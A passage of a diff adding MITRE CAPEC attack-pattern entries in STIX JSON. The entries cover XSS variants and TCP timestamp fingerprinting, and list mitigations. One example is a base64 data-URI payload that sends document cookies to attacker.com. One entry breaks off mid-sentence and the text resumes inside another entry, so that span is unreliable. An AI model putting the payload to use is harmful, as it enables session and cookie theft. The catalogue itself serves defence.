If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.", + "external_references": [ + { + "external_id": "CAPEC-243", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/243.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Jeremiah Grossman, Attribute-Based Cross-Site Scripting", + "external_id": "REF-94", + "source_name": "reference_from_CAPEC", + "url": "http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html" + } + ], + "id": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Targeting HTML Attributes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS targeting HTML attributes: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various malicious expressions as input, hoping to embed them as HTML attributes.

  2. Techniques
    Inject single and double quotes into URL parameters or other inputs to see if they are filtered out. Also use URL encoding to bypass filters.
    Use single or double quotes to close attribute evaluation and enter a new attribute that contains an expression.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Execute a script using an expression embedded in an HTML attribute, which avoids needing to inject a script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_prerequisites": [ + "The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands." + ], + "x_capec_resources_required": [ + "The adversary must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0809c5e1-86fc-4df6-8e5e-50939743e745", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for all input including that which is not expected to have any scripting content.", + "id": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-243-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f1ebe4-ac7e-4221-af0e-4f36e5905da9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--efed9086-1bee-4608-a734-9e9b775b744f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits the ability of most browsers to interpret \"data\", \"javascript\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. 
The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.", + "external_references": [ + { + "external_id": "CAPEC-244", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/244.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Google Cross-Site Scripting HOWTO article, Google", + "external_id": "REF-96", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/doctype/wikis/ArticleXSSInUrlAttributes.wiki" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting URI Placeholders", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], 
+ "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following payload data:\n text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==\n represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.\n The decoded payload is the following piece of HTML code:\n \n \n \n Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.\n An adversary could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):\n My Link\n Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various payloads formatted as data URI schemes using base to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious payload formatted as a URI scheme, or use the URL returned when the URI scheme was given as input to the web application.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application" + ], + "x_capec_skills_required": { + "Medium": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e01b3e67-6f6d-47fe-a52a-568341eaba2c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-244-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1be8912-a434-4763-a021-096909c3c231", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2dd74b7-ad13-4193-b646-3ae46944b3c3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4100acc-da5c-4fd0-a273-8a3d0fe4ea3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d630925-153a-43e4-a045-6c039ccdbdbe", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9508c797-2ba7-4939-a345-8ab83ec69feb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b5c6c90-751d-4b9c-b88f-480109d98c30", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76657fee-14db-472c-9608-b7bce62e9fb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. 
Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<", + "\n Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an adversary would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.\n Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the adversary, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe public links for XSS vulnerability: The adversary uses the public links gathered in the \"Explore\" phase as a target list and requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.

  2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation." + ], + "x_capec_resources_required": [ + "Ability to send HTTP post to scripting host and collect output" + ], + "x_capec_skills_required": { + "High": "Exploiting any information gathered by HTTP Query on script host", + "Low": "To place malicious payload on server via HTTP" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cc8dc0d-4869-4cb5-8228-263779929d0c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Server side developers should not proxy content via XHR or other means, if 
a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.", + "id": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39f61c35-1731-4cb8-a8eb-bcd81960df63", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b600559a-7621-438f-92e9-088c3cdf5117", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00dd576f-a986-4094-aa7c-3eb1b57dc7d3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc0ab859-a9fe-4f70-a2f6-4e43fa7ba77b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Session tokens for specific host", + "id": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--df6702e1-0cee-4251-8188-443a16f750d1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5e5619cd-3104-4816-91eb-2836496ecc8c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode", + "id": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b1356d6-39be-4183-9bbf-e8fa5b7f799e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.", + "external_references": [ + { + "external_id": "CAPEC-320", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/320.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to 
Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15fddec-fd55-4c0b-8681-4e57ba5bc20d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Timestamp Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if timestamps are present.: The adversary sends a probe packet to the remote host to identify if timestamps are present.

Experiment

  1. Record and analyze timestamp values.: If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.

  2. Techniques
    The adversary sends several requests and records the timestamp values.
    The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.
    The adversary compares this result to a database of known TCP timestamp increments for a possible match.
